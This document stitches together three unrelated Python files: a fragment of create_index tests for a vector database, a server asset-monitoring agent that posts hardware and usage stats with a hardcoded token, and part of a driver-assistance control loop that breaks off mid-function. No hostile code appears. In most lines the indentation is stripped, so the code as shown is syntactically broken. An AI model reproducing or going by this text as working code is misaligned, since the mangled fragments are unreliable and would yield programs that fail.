def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
log.info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
log.info("before result")
res = future.result()
# TODO:
log.info(res)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, connect, collection):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, default_index, _async=True)
connect.drop_collection(collection)
with pytest.raises(Exception, match=f'DescribeIndex failed: collection {collection} not found'):
connect.describe_index(collection, "")
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_collection_name(self, connect):
collection_name = " "
with pytest.raises(Exception) as e:
future = connect.create_index(collection_name, field_name, default_index, _async=True)
res = future.result()
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
log.info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True,
_callback=self.check_result)
log.info("before result")
res = future.result()
# TODO:
log.info(res)
|
adminset_agent.py
|
#!/usr/bin/env python
# coding=utf-8
import os, re, platform, socket, time, json, threading
import psutil, schedule, requests
from subprocess import Popen, PIPE
import logging
AGENT_VERSION = "0.21"
token = 'HPcWR7l4NJNJ'
server_ip = '192.168.47.130'
def log(log_name, path=""):
    # configure the root logger to append text records to path + log_name
    # (the previous filemode 'ab+' opened the file in binary mode, which breaks
    # logging on Python 3; plain append mode works on both interpreters)
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s %(message)s',
                        datefmt='%Y%m%d %H:%M:%S',
                        filename=path + log_name,
                        filemode='a')
    return logging.getLogger()
log("agent.log", "/var/opt/adminset/client/")
def get_ip():
try:
hostname = socket.getfqdn(socket.gethostname())
ipaddr = socket.gethostbyname(hostname)
except Exception as msg:
print(msg)
ipaddr = ''
return ipaddr
def get_dmi():
p = Popen('dmidecode', stdout=PIPE, shell=True)
stdout, stderr = p.communicate()
return stdout
def parser_dmi(dmidata):
pd = {}
line_in = False
for line in dmidata.split('\n'):
if line.startswith('System Information'):
line_in = True
continue
if line.startswith('\t') and line_in:
            k, v = [i.strip() for i in line.split(':', 1)]
pd[k] = v
else:
line_in = False
return pd
def get_mem_total():
cmd = "grep MemTotal /proc/meminfo"
p = Popen(cmd, stdout=PIPE, shell = True)
data = p.communicate()[0]
mem_total = data.split()[1]
memtotal = int(round(int(mem_total)/1024.0/1024.0, 0))
return memtotal
def get_cpu_model():
cmd = "cat /proc/cpuinfo"
p = Popen(cmd, stdout=PIPE, stderr = PIPE, shell = True)
stdout, stderr = p.communicate()
return stdout
def get_cpu_cores():
cpu_cores = {"physical": psutil.cpu_count(logical=False) if psutil.cpu_count(logical=False) else 0, "logical": psutil.cpu_count()}
return cpu_cores
def parser_cpu(stdout):
groups = [i for i in stdout.split('\n\n')]
group = groups[-2]
cpu_list = [i for i in group.split('\n')]
cpu_info = {}
for x in cpu_list:
# split on the first ':' only; values in /proc/cpuinfo can contain colons
k, v = [i.strip() for i in x.split(':', 1)]
cpu_info[k] = v
return cpu_info
def get_disk_info():
ret = []
cmd = "fdisk -l|egrep '^Disk\s/dev/[a-z]+:\s\w*'"
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
for i in stdout.split('\n'):
disk_info = i.split(",")
if disk_info[0]:
ret.append(disk_info[0])
return ret
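# Illustrative fdisk line and the piece kept (everything before the first comma):
#   "Disk /dev/sda: 21.5 GB, 21474836480 bytes"  ->  "Disk /dev/sda: 21.5 GB"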
def post_data(url, data):
try:
r = requests.post(url, data)
if r.text:
logging.info(r.text)
else:
logging.info("Server return http status code: {0}".format(r.status_code))
except Exception as msg:
logging.info(msg)
return True
def asset_info():
data_info = dict()
data_info['memory'] = get_mem_total()
data_info['disk'] = str(get_disk_info())
cpuinfo = parser_cpu(get_cpu_model())
cpucore = get_cpu_cores()
data_info['cpu_num'] = cpucore['logical']
data_info['cpu_physical'] = cpucore['physical']
data_info['cpu_model'] = cpuinfo['model name']
data_info['ip'] = get_ip()
dmi = parser_dmi(get_dmi())  # run dmidecode once instead of three times
data_info['sn'] = dmi['Serial Number']
data_info['vendor'] = dmi['Manufacturer']
data_info['product'] = dmi['Version']
# platform.linux_distribution() was removed in Python 3.8; this script targets older interpreters
data_info['osver'] = platform.linux_distribution()[0] + " " + platform.linux_distribution()[1] + " " + platform.machine()
data_info['hostname'] = platform.node()
data_info['token'] = token
data_info['agent_version'] = AGENT_VERSION
return json.dumps(data_info)
def asset_info_post():
pversion = platform.python_version()
pv = re.search(r'2\.6', pversion)  # escape the dot so e.g. '216' does not match
if not pv:
osenv = os.environ["LANG"]
os.environ["LANG"] = "en_US.UTF-8"
logging.info('Get the hardware info from host:')
logging.info(asset_info())
logging.info('----------------------------------------------------------')
post_data("http://{0}/cmdb/collect".format(server_ip), asset_info())
if not pv:
os.environ["LANG"] = osenv
return True
def get_sys_cpu():
sys_cpu = {}
cpu_time = psutil.cpu_times_percent(interval=1)
sys_cpu['percent'] = psutil.cpu_percent(interval=1)
sys_cpu['lcpu_percent'] = psutil.cpu_percent(interval=1, percpu=True)
sys_cpu['user'] = cpu_time.user
sys_cpu['nice'] = cpu_time.nice
sys_cpu['system'] = cpu_time.system
sys_cpu['idle'] = cpu_time.idle
sys_cpu['iowait'] = cpu_time.iowait
sys_cpu['irq'] = cpu_time.irq
sys_cpu['softirq'] = cpu_time.softirq
sys_cpu['guest'] = cpu_time.guest
return sys_cpu
def get_sys_mem():
sys_mem = {}
mem = psutil.virtual_memory()
sys_mem["total"] = mem.total/1024/1024
sys_mem["percent"] = mem.percent
sys_mem["available"] = mem.available/1024/1024
sys_mem["used"] = mem.used/1024/1024
sys_mem["free"] = mem.free/1024/1024
sys_mem["buffers"] = mem.buffers/1024/1024
sys_mem["cached"] = mem.cached/1024/1024
return sys_mem
def parser_sys_disk(mountpoint):
partitions_list = {}
d = psutil.disk_usage(mountpoint)
partitions_list['mountpoint'] = mountpoint
partitions_list['total'] = round(d.total/1024/1024/1024.0, 2)
partitions_list['free'] = round(d.free/1024/1024/1024.0, 2)
partitions_list['used'] = round(d.used/1024/1024/1024.0, 2)
partitions_list['percent'] = d.percent
return partitions_list
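# Illustrative return value for parser_sys_disk('/') (numbers are made up):
#   {'mountpoint': '/', 'total': 40.0, 'free': 21.5, 'used': 18.5, 'percent': 46.2}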
def get_sys_disk():
sys_disk = {}
partition_info = []
partitions = psutil.disk_partitions()
for p in partitions:
partition_info.append(parser_sys_disk(p.mountpoint))
sys_disk = partition_info
return sys_disk
# Collect the sent/received byte counters for each NIC
def get_nic():
counters = psutil.net_io_counters(pernic=True)  # snapshot the per-NIC counters once
recv = {}
sent = {}
for key in counters.keys():
recv.setdefault(key, counters.get(key).bytes_recv)  # bytes received per NIC
sent.setdefault(key, counters.get(key).bytes_sent)  # bytes sent per NIC
return counters.keys(), recv, sent
# Compute per-second rates from two samples taken one second apart
def get_nic_rate(func):
key_info, old_recv, old_sent = func()  # counters sampled one second ago
time.sleep(1)
key_info, now_recv, now_sent = func()  # counters sampled now
net_in = {}
net_out = {}
for key in key_info:
net_in.setdefault(key, (now_recv.get(key) - old_recv.get(key)) / 1024)  # inbound KB/s
net_out.setdefault(key, (now_sent.get(key) - old_sent.get(key)) / 1024)  # outbound KB/s
return key_info, net_in, net_out
def get_net_info():
net_info = []
key_info, net_in, net_out = get_nic_rate(get_nic)
for key in key_info:
in_data = net_in.get(key)
out_data = net_out.get(key)
net_info.append({"nic_name": key, "traffic_in": in_data, "traffic_out": out_data})
return net_info
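# Illustrative get_net_info() result; traffic values are the KB/s computed above:
#   [{'nic_name': 'eth0', 'traffic_in': 12.3, 'traffic_out': 4.5},
#    {'nic_name': 'lo', 'traffic_in': 0.0, 'traffic_out': 0.0}]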
def agg_sys_info():
logging.info('Get the system infos from host:')
sys_info = {'hostname': platform.node(),
'cpu': get_sys_cpu(),
'mem': get_sys_mem(),
'disk': get_sys_disk(),
'net': get_net_info(),
'token': token}
logging.info(sys_info)
json_data = json.dumps(sys_info)
logging.info('----------------------------------------------------------')
post_data("http://{0}/monitor/received/sys/info/".format(server_ip), json_data)
return True
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
def get_pid():
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
pid = str(os.getpid())
with open(BASE_DIR + "/adminsetd.pid", "w") as pid_file:
pid_file.write(pid)
if __name__ == "__main__":
get_pid()
asset_info_post()
time.sleep(1)
agg_sys_info()
schedule.every(3600).seconds.do(run_threaded, asset_info_post)
schedule.every(300).seconds.do(run_threaded, agg_sys_info)
while True:
schedule.run_pending()
time.sleep(1)
|
controlsd.py
|
#!/usr/bin/env python3
import os
import gc
import requests
import threading
from cereal import car, log
from selfdrive.crash import client
from common.android import ANDROID, get_sound_card_online
from common.numpy_fast import clip
from common.realtime import sec_since_boot, set_realtime_priority, set_core_affinity, Ratekeeper, DT_CTRL
from common.profiler import Profiler
from common.params import Params, put_nonblocking
import cereal.messaging as messaging
from selfdrive.config import Conversions as CV
from selfdrive.boardd.boardd import can_list_to_can_capnp
from selfdrive.car.car_helpers import get_car, get_startup_event
from selfdrive.controls.lib.drive_helpers import update_v_cruise, initialize_v_cruise
from selfdrive.controls.lib.longcontrol import LongControl, STARTING_TARGET_SPEED
from selfdrive.controls.lib.latcontrol_pid import LatControlPID
from selfdrive.controls.lib.latcontrol_indi import LatControlINDI
from selfdrive.controls.lib.latcontrol_lqr import LatControlLQR
from selfdrive.controls.lib.events import Events, ET
from selfdrive.controls.lib.alertmanager import AlertManager
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.controls.lib.planner import LON_MPC_STEP
from selfdrive.locationd.calibration_helpers import Calibration
from selfdrive.controls.lib.dynamic_follow.df_manager import dfManager
from common.op_params import opParams
LDW_MIN_SPEED = 31 * CV.MPH_TO_MS
LANE_DEPARTURE_THRESHOLD = 0.1
STEER_ANGLE_SATURATION_TIMEOUT = 1.0 / DT_CTRL
STEER_ANGLE_SATURATION_THRESHOLD = 2.5 # Degrees
ThermalStatus = log.ThermalData.ThermalStatus
State = log.ControlsState.OpenpilotState
HwType = log.HealthData.HwType
LongitudinalPlanSource = log.Plan.LongitudinalPlanSource
Desire = log.PathPlan.Desire
LaneChangeState = log.PathPlan.LaneChangeState
LaneChangeDirection = log.PathPlan.LaneChangeDirection
EventName = car.CarEvent.EventName
def log_fingerprint(candidate, timeout=30):
try:
requests.get('https://sentry.io', timeout=timeout)
client.captureMessage("fingerprinted {}".format(candidate), level='info')
return
except Exception:
# fingerprint reporting is best-effort; never let it crash controls
pass
class Controls:
def __init__(self, sm=None, pm=None, can_sock=None):
gc.disable()
set_realtime_priority(53)
set_core_affinity(3)
# Setup sockets
self.pm = pm
if self.pm is None:
self.pm = messaging.PubMaster(['sendcan', 'controlsState', 'carState',
'carControl', 'carEvents', 'carParams'])
self.sm = sm
if self.sm is None:
self.sm = messaging.SubMaster(['thermal', 'health', 'frame', 'model', 'liveCalibration',
'dMonitoringState', 'plan', 'pathPlan', 'liveLocationKalman'])
self.sm_smiskol = messaging.SubMaster(['radarState', 'dynamicFollowData', 'liveTracks', 'dynamicFollowButton',
'laneSpeed', 'dynamicCameraOffset', 'modelLongButton'])
self.op_params = opParams()
self.df_manager = dfManager(self.op_params)
self.hide_auto_df_alerts = self.op_params.get('hide_auto_df_alerts')
self.support_white_panda = self.op_params.get('support_white_panda')
self.last_model_long = False
self.can_sock = can_sock
if can_sock is None:
can_timeout = None if os.environ.get('NO_CAN_TIMEOUT', False) else 100
self.can_sock = messaging.sub_sock('can', timeout=can_timeout)
# wait for one health and one CAN packet
hw_type = messaging.recv_one(self.sm.sock['health']).health.hwType
has_relay = hw_type in [HwType.blackPanda, HwType.uno, HwType.dos]
print("Waiting for CAN messages...")
messaging.get_one_can(self.can_sock)
self.CI, self.CP, candidate = get_car(self.can_sock, self.pm.sock['sendcan'], has_relay)
threading.Thread(target=log_fingerprint, args=[candidate]).start()
# read params
params = Params()
self.is_metric = params.get("IsMetric", encoding='utf8') == "1"
self.is_ldw_enabled = params.get("IsLdwEnabled", encoding='utf8') == "1"
internet_needed = (params.get("Offroad_ConnectivityNeeded", encoding='utf8') is not None) and (params.get("DisableUpdates") != b"1")
community_feature_toggle = params.get("CommunityFeaturesToggle", encoding='utf8') == "1"
openpilot_enabled_toggle = params.get("OpenpilotEnabledToggle", encoding='utf8') == "1"
passive = params.get("Passive", encoding='utf8') == "1" or \
internet_needed or not openpilot_enabled_toggle
# detect sound card presence and ensure successful init
sounds_available = not ANDROID or get_sound_card_online()
car_recognized = self.CP.carName != 'mock'
# Controls are available if the stock camera is disconnected, car controls are loaded, and we're not passive
controller_available = self.CP.enableCamera and self.CI.CC is not None and not passive
community_feature_disallowed = self.CP.communityFeature and not community_feature_toggle
self.read_only = not car_recognized or not controller_available or \
self.CP.dashcamOnly or community_feature_disallowed
if self.read_only:
self.CP.safetyModel = car.CarParams.SafetyModel.noOutput
# Write CarParams for radard and boardd safety mode
cp_bytes = self.CP.to_bytes()
params.put("CarParams", cp_bytes)
put_nonblocking("CarParamsCache", cp_bytes)
put_nonblocking("LongitudinalControl", "1" if self.CP.openpilotLongitudinalControl else "0")
self.CC = car.CarControl.new_message()
self.AM = AlertManager()
self.events = Events()
self.LoC = LongControl(self.CP, self.CI.compute_gb, candidate)
self.VM = VehicleModel(self.CP)
if self.CP.lateralTuning.which() == 'pid':
self.LaC = LatControlPID(self.CP)
elif self.CP.lateralTuning.which() == 'indi':
self.LaC = LatControlINDI(self.CP)
elif self.CP.lateralTuning.which() == 'lqr':
self.LaC = LatControlLQR(self.CP)
self.state = State.disabled
self.enabled = False
self.active = False
self.can_rcv_error = False
self.soft_disable_timer = 0
self.v_cruise_kph = 255
self.v_cruise_kph_last = 0
self.mismatch_counter = 0
self.can_error_counter = 0
self.last_blinker_frame = 0
self.saturated_count = 0
self.distance_traveled = 0
self.events_prev = []
self.current_alert_types = [ET.PERMANENT]
self.sm['liveCalibration'].calStatus = Calibration.INVALID
self.sm['thermal'].freeSpace = 1.
self.sm['dMonitoringState'].events = []
self.sm['dMonitoringState'].awarenessStatus = 1.
self.sm['dMonitoringState'].faceDetected = False
self.startup_event = get_startup_event(car_recognized, controller_available)
if not sounds_available:
self.events.add(EventName.soundsUnavailable, static=True)
if internet_needed:
self.events.add(EventName.internetConnectivityNeeded, static=True)
if community_feature_disallowed:
self.events.add(EventName.communityFeatureDisallowed, static=True)
if self.read_only and not passive:
self.events.add(EventName.carUnrecognized, static=True)
if not self.support_white_panda:
if hw_type == HwType.whitePanda:
self.events.add(EventName.whitePandaUnsupported, static=True)
# controlsd is driven by can recv, expected at 100Hz
self.rk = Ratekeeper(100, print_delay_threshold=None)
self.prof = Profiler(False) # off by default
def update_events(self, CS):
"""Compute carEvents from carState"""
self.events.clear()
self.events.add_from_msg(CS.events)
self.events.add_from_msg(self.sm['dMonitoringState'].events)
# Handle startup event
if self.startup_event is not None:
self.events.add(self.startup_event)
self.startup_event = None
# Create events for battery, temperature, disk space, and memory
if self.sm['thermal'].batteryPercent < 1 and self.sm['thermal'].chargingError:
# at zero percent battery, while discharging, OP should not be allowed
self.events.add(EventName.lowBattery)
if self.sm['thermal'].thermalStatus >= ThermalStatus.red:
self.events.add(EventName.overheat)
if self.sm['thermal'].freeSpace < 0.07:
# under 7% of space free no enable allowed
self.events.add(EventName.outOfSpace)
if self.sm['thermal'].memUsedPercent > 90:
self.events.add(EventName.lowMemory)
# Handle calibration status
cal_status = self.sm['liveCalibration'].calStatus
if cal_status != Calibration.CALIBRATED:
if cal_status == Calibration.UNCALIBRATED:
self.events.add(EventName.calibrationIncomplete)
else:
self.events.add(EventName.calibrationInvalid)
# Handle lane change
if self.sm['pathPlan'].laneChangeState == LaneChangeState.preLaneChange:
direction = self.sm['pathPlan'].laneChangeDirection
if (CS.leftBlindspot and direction == LaneChangeDirection.left) or \
(CS.rightBlindspot and direction == LaneChangeDirection.right):
self.events.add(EventName.laneChangeBlocked)
else:
if direction == LaneChangeDirection.left:
self.events.add(EventName.preLaneChangeLeft)
else:
self.events.add(EventName.preLaneChangeRight)
elif self.sm['pathPlan'].laneChangeState in [LaneChangeState.laneChangeStarting,
LaneChangeState.laneChangeFinishing]:
self.events.add(EventName.laneChange)
if self.can_rcv_error or (not CS.canValid and self.sm.frame > 5 / DT_CTRL):
self.events.add(EventName.canError)
if self.mismatch_counter >= 200:
self.events.add(EventName.controlsMismatch)
if not self.sm.alive['plan'] and self.sm.alive['pathPlan']:
# only plan not being received: radar not communicating
self.events.add(EventName.radarCommIssue)
elif not self.sm.all_alive_and_valid():
self.events.add(EventName.commIssue)
if not self.sm['pathPlan'].mpcSolutionValid:
self.events.add(EventName.plannerError)
if not self.sm['liveLocationKalman'].sensorsOK and os.getenv("NOSENSOR") is None:
if self.sm.frame > 5 / DT_CTRL: # Give locationd some time to receive all the inputs
self.events.add(EventName.sensorDataInvalid)
if not self.sm['liveLocationKalman'].gpsOK and (self.distance_traveled > 1000) and os.getenv("NOSENSOR") is None and not self.support_white_panda:
# Not shown in the first 1 km, to allow for driving out of a garage; this event shows after 5 minutes
self.events.add(EventName.noGps)
if not self.sm['pathPlan'].paramsValid:
self.events.add(EventName.vehicleModelInvalid)
if not self.sm['liveLocationKalman'].posenetOK:
self.events.add(EventName.posenetInvalid)
if not self.sm['frame'].recoverState < 2:
# counter>=2 is active
self.events.add(EventName.focusRecoverActive)
if not self.sm['plan'].radarValid:
self.events.add(EventName.radarFault)
if self.sm['plan'].radarCanError:
self.events.add(EventName.radarCanError)
if log.HealthData.FaultType.relayMalfunction in self.sm['health'].faults:
self.events.add(EventName.relayMalfunction)
if self.sm['plan'].fcw:
self.events.add(EventName.fcw)
if self.sm['model'].frameDropPerc > 1:
self.events.add(EventName.modeldLagging)
# Only allow engagement with brake pressed when stopped behind another stopped car
if CS.brakePressed and self.sm['plan'].vTargetFuture >= STARTING_TARGET_SPEED \
and not self.CP.radarOffCan and CS.vEgo < 0.3:
self.events.add(EventName.noTarget)
self.add_stock_additions_alerts(CS)
def add_stock_additions_alerts(self, CS):
self.AM.SA_set_frame(self.sm.frame)
self.AM.SA_set_enabled(self.enabled)
# alert priority is defined by code location, keeping is highest, then lane speed alert, then auto-df alert
if self.sm_smiskol['modelLongButton'].enabled != self.last_model_long:
extra_text_1 = 'disabled!' if self.last_model_long else 'enabled!'
extra_text_2 = '' if self.last_model_long else ', model may slow unexpectedly'
self.AM.SA_add('modelLongAlert', extra_text_1=extra_text_1, extra_text_2=extra_text_2)
return
if self.sm_smiskol['dynamicCameraOffset'].keepingLeft:
self.AM.SA_add('laneSpeedKeeping', extra_text_1='LEFT', extra_text_2='Oncoming traffic in right lane')
return
elif self.sm_smiskol['dynamicCameraOffset'].keepingRight:
self.AM.SA_add('laneSpeedKeeping', extra_text_1='RIGHT', extra_text_2='Oncoming traffic in left lane')
return
ls_state = self.sm_smiskol['laneSpeed'].state
if ls_state != '':
self.AM.SA_add('lsButtonAlert', extra_text_1=ls_state)
return
faster_lane = self.sm_smiskol['laneSpeed'].fastestLane
if faster_lane in ['left', 'right']:
ls_alert = 'laneSpeedAlert'
if not self.sm_smiskol['laneSpeed'].new:
ls_alert += 'Silent'
self.AM.SA_add(ls_alert, extra_text_1='{} lane faster'.format(faster_lane).upper(), extra_text_2='Change lanes to faster {} lane'.format(faster_lane))
return
df_out = self.df_manager.update()
if df_out.changed:
df_alert = 'dfButtonAlert'
if df_out.is_auto and df_out.last_is_auto:
# when engaged and auto-df alerts aren't hidden, show the auto-profile alert silently
if CS.cruiseState.enabled and not self.hide_auto_df_alerts:
df_alert += 'Silent'
self.AM.SA_add(df_alert, extra_text_1=df_out.model_profile_text + ' (auto)')
return
else:
self.AM.SA_add(df_alert, extra_text_1=df_out.user_profile_text, extra_text_2='Dynamic follow: {} profile active'.format(df_out.user_profile_text))
return
def data_sample(self):
"""Receive data from sockets and update carState"""
# Update carState from CAN
can_strs = messaging.drain_sock_raw(self.can_sock, wait_for_one=True)
CS = self.CI.update(self.CC, can_strs)
self.sm.update(0)
self.sm_smiskol.update(0)
# Check for CAN timeout
if not can_strs:
self.can_error_counter += 1
self.can_rcv_error = True
else:
self.can_rcv_error = False
# When the panda and controlsd do not agree on controls_allowed
# we want to disengage openpilot. However the status from the panda goes through
# a different socket than the CAN messages and one can arrive earlier than the other.
# Therefore we tolerate a mismatch for up to 200 samples (~2s at 100Hz) before disengaging.
if not self.enabled:
self.mismatch_counter = 0
if not self.sm['health'].controlsAllowed and self.enabled:
self.mismatch_counter += 1
self.distance_traveled += CS.vEgo * DT_CTRL
return CS
def state_transition(self, CS):
"""Compute conditional state transitions and execute actions on state transitions"""
self.v_cruise_kph_last = self.v_cruise_kph
# if stock cruise is completely disabled, then we can use our own set speed logic
if not self.CP.enableCruise:
self.v_cruise_kph = update_v_cruise(self.v_cruise_kph, CS.buttonEvents, self.enabled)
elif self.CP.enableCruise and CS.cruiseState.enabled:
self.v_cruise_kph = CS.cruiseState.speed * CV.MS_TO_KPH
# decrease the soft disable timer at every step, as it's reset on
# entrance in SOFT_DISABLING state
self.soft_disable_timer = max(0, self.soft_disable_timer - 1)
self.current_alert_types = [ET.PERMANENT]
# ENABLED, PRE ENABLING, SOFT DISABLING
if self.state != State.disabled:
# user and immediate disable always have priority in a non-disabled state
if self.events.any(ET.USER_DISABLE):
self.state = State.disabled
self.current_alert_types.append(ET.USER_DISABLE)
elif self.events.any(ET.IMMEDIATE_DISABLE):
self.state = State.disabled
self.current_alert_types.append(ET.IMMEDIATE_DISABLE)
else:
# ENABLED
if self.state == State.enabled:
if self.events.any(ET.SOFT_DISABLE):
self.state = State.softDisabling
self.soft_disable_timer = 300 # 3s
self.current_alert_types.append(ET.SOFT_DISABLE)
# SOFT DISABLING
elif self.state == State.softDisabling:
if not self.events.any(ET.SOFT_DISABLE):
# no more soft disabling condition, so go back to ENABLED
self.state = State.enabled
elif self.events.any(ET.SOFT_DISABLE) and self.soft_disable_timer > 0:
self.current_alert_types.append(ET.SOFT_DISABLE)
elif self.soft_disable_timer <= 0:
self.state = State.disabled
# PRE ENABLING
elif self.state == State.preEnabled:
if not self.events.any(ET.PRE_ENABLE):
self.state = State.enabled
else:
self.current_alert_types.append(ET.PRE_ENABLE)
# DISABLED
elif self.state == State.disabled:
if self.events.any(ET.ENABLE):
if self.events.any(ET.NO_ENTRY):
self.current_alert_types.append(ET.NO_ENTRY)
else:
if self.events.any(ET.PRE_ENABLE):
self.state = State.preEnabled
else:
self.state = State.enabled
self.current_alert_types.append(ET.ENABLE)
self.v_cruise_kph = initialize_v_cruise(CS.vEgo, CS.buttonEvents, self.v_cruise_kph_last)
# Check if actuators are enabled
self.active = self.state == State.enabled or self.state == State.softDisabling
if self.active:
self.current_alert_types.append(ET.WARNING)
# Check if openpilot is engaged
self.enabled = self.active or self.state == State.preEnabled
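# State machine summary of the transitions above: USER_DISABLE/IMMEDIATE_DISABLE
# force disabled from any non-disabled state; enabled -> softDisabling on
# SOFT_DISABLE (3s timer), returning to enabled if the condition clears or
# falling to disabled when the timer expires; disabled -> preEnabled/enabled
# on ENABLE unless a NO_ENTRY event blocks it.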
def state_control(self, CS):
"""Given the state, this function returns an actuators packet"""
plan = self.sm['plan']
path_plan = self.sm['pathPlan']
actuators = car.CarControl.Actuators.new_message()
if CS.leftBlinker or CS.rightBlinker:
self.last_blinker_frame = self.sm.frame
# State specific actions
if not self.active:
self.LaC.reset()
self.LoC.reset(v_pid=plan.vTargetFuture)
plan_age = DT_CTRL * (self.sm.frame - self.sm.rcv_frame['plan'])
# no greater than dt mpc + dt, to prevent extrapolating too far
dt = min(plan_age, LON_MPC_STEP + DT_CTRL) + DT_CTRL
a_acc_sol = plan.aStart + (dt / LON_MPC_STEP) * (plan.aTarget - plan.aStart)
v_acc_sol = plan.vStart + dt * (a_acc_sol + plan.aStart) / 2.0
extras_loc = {'lead_one': self.sm_smiskol['radarState'].leadOne, 'mpc_TR': self.sm_smiskol['dynamicFollowData'].mpcTR,
'live_tracks': self.sm_smiskol['liveTracks'], 'has_lead': plan.hasLead}
# Gas/Brake PID loop
actuators.gas, actuators.brake = self.LoC.update(self.active, CS, v_acc_sol, plan.vTargetFuture, a_acc_sol, self.CP, extras_loc)
# Steering PID loop and lateral MPC
actuators.steer, actuators.steerAngle, lac_log = self.LaC.update(self.active, CS, self.CP, path_plan)
# Check for difference between desired angle and angle for angle based control
angle_control_saturated = self.CP.steerControlType == car.CarParams.SteerControlType.angle and \
abs(actuators.steerAngle - CS.steeringAngle) > STEER_ANGLE_SATURATION_THRESHOLD
if angle_control_saturated and not CS.steeringPressed and self.active:
self.saturated_count += 1
else:
self.saturated_count = 0
# Send a "steering required alert" if saturation count has reached the limit
if (lac_log.saturated and not CS.steeringPressed) or \
(self.saturated_count > STEER_ANGLE_SATURATION_TIMEOUT):
# Check if we deviated from the path
left_deviation = actuators.steer > 0 and path_plan.dPoly[3] > 0.1
right_deviation = actuators.steer < 0 and path_plan.dPoly[3] < -0.1
if left_deviation or right_deviation:
self.events.add(EventName.steerSaturated)
return actuators, v_acc_sol, a_acc_sol, lac_log
def publish_logs(self, CS, start_time, actuators, v_acc, a_acc, lac_log):
"""Send actuators and hud commands to the car, send controlsstate and MPC logging"""
CC = car.CarControl.new_message()
CC.enabled = self.enabled
CC.actuators = actuators
CC.cruiseControl.override = True
CC.cruiseControl.cancel = not self.CP.enableCruise or (not self.enabled and CS.cruiseState.enabled)
# Some override values for Honda
# brake discount removes a sharp nonlinearity
brake_discount = (1.0 - clip(actuators.brake * 3., 0.0, 1.0))
speed_override = max(0.0, (self.LoC.v_pid + CS.cruiseState.speedOffset) * brake_discount)
CC.cruiseControl.speedOverride = float(speed_override if self.CP.enableCruise else 0.0)
CC.cruiseControl.accelOverride = self.CI.calc_accel_override(CS.aEgo, self.sm['plan'].aTarget, CS.vEgo, self.sm['plan'].vTarget)
CC.hudControl.setSpeed = float(self.v_cruise_kph * CV.KPH_TO_MS)
CC.hudControl.speedVisible = self.enabled
CC.hudControl.lanesVisible = self.enabled
CC.hudControl.leadVisible = self.sm['plan'].hasLead
right_lane_visible = self.sm['pathPlan'].rProb > 0.5
left_lane_visible = self.sm['pathPlan'].lProb > 0.5
CC.hudControl.rightLaneVisible = bool(right_lane_visible)
CC.hudControl.leftLaneVisible = bool(left_lane_visible)
recent_blinker = (self.sm.frame - self.last_blinker_frame) * DT_CTRL < 5.0 # 5s blinker cooldown
ldw_allowed = self.is_ldw_enabled and CS.vEgo > LDW_MIN_SPEED and not recent_blinker \
and not self.active and self.sm['liveCalibration'].calStatus == Calibration.CALIBRATED
meta = self.sm['model'].meta
if len(meta.desirePrediction) and ldw_allowed:
l_lane_change_prob = meta.desirePrediction[Desire.laneChangeLeft - 1]
r_lane_change_prob = meta.desirePrediction[Desire.laneChangeRight - 1]
CAMERA_OFFSET = self.op_params.get('camera_offset')
l_lane_close = left_lane_visible and (self.sm['pathPlan'].lPoly[3] < (1.08 - CAMERA_OFFSET))
r_lane_close = right_lane_visible and (self.sm['pathPlan'].rPoly[3] > -(1.08 + CAMERA_OFFSET))
CC.hudControl.leftLaneDepart = bool(l_lane_change_prob > LANE_DEPARTURE_THRESHOLD and l_lane_close)
CC.hudControl.rightLaneDepart = bool(r_lane_change_prob > LANE_DEPARTURE_THRESHOLD and r_lane_close)
if CC.hudControl.rightLaneDepart or CC.hudControl.leftLaneDepart:
self.events.add(EventName.ldw)
alerts = self.events.create_alerts(self.current_alert_types, [self.CP, self.sm, self.is_metric])
self.AM.add_many(self.sm.frame, alerts, self.enabled)
self.last_model_long = self.sm_smiskol['modelLongButton'].enabled
self.AM.process_alerts(self.sm.frame)
CC.hudControl.visualAlert = self.AM.visual_alert
if not self.read_only:
# send car controls over can
can_sends = self.CI.apply(CC)
self.pm.send('sendcan', can_list_to_can_capnp(can_sends, msgtype='sendcan', valid=CS.canValid))
force_decel = (self.sm['dMonitoringState'].awarenessStatus < 0.) or \
(self.state == State.softDisabling)
steer_angle_rad = (CS.steeringAngle - self.sm['pathPlan'].angleOffset) * CV.DEG_TO_RAD
# controlsState
dat = messaging.new_message('controlsState')
dat.valid = CS.canValid
controlsState = dat.controlsState
controlsState.alertText1 = self.AM.alert_text_1
controlsState.alertText2 = self.AM.alert_text_2
controlsState.alertSize = self.AM.alert_size
controlsState.alertStatus = self.AM.alert_status
controlsState.alertBlinkingRate = self.AM.alert_rate
controlsState.alertType = self.AM.alert_type
controlsState.alertSound = self.AM.audible_alert
controlsState.driverMonitoringOn = self.sm['dMonitoringState'].faceDetected
controlsState.canMonoTimes = list(CS.canMonoTimes)
controlsState.planMonoTime = self.sm.logMonoTime['plan']
controlsState.pathPlanMonoTime = self.sm.logMonoTime['pathPlan']
controlsState.enabled = self.enabled
controlsState.active = self.active
controlsState.vEgo = CS.vEgo
controlsState.vEgoRaw = CS.vEgoRaw
controlsState.angleSteers = CS.steeringAngle
controlsState.curvature = self.VM.calc_curvature(steer_angle_rad, CS.vEgo)
controlsState.steerOverride = CS.steeringPressed
controlsState.state = self.state
controlsState.engageable = not self.events.any(ET.NO_ENTRY)
controlsState.longControlState = self.LoC.long_control_state
controlsState.vPid = float(self.LoC.v_pid)
controlsState.vCruise = float(self.v_cruise_kph)
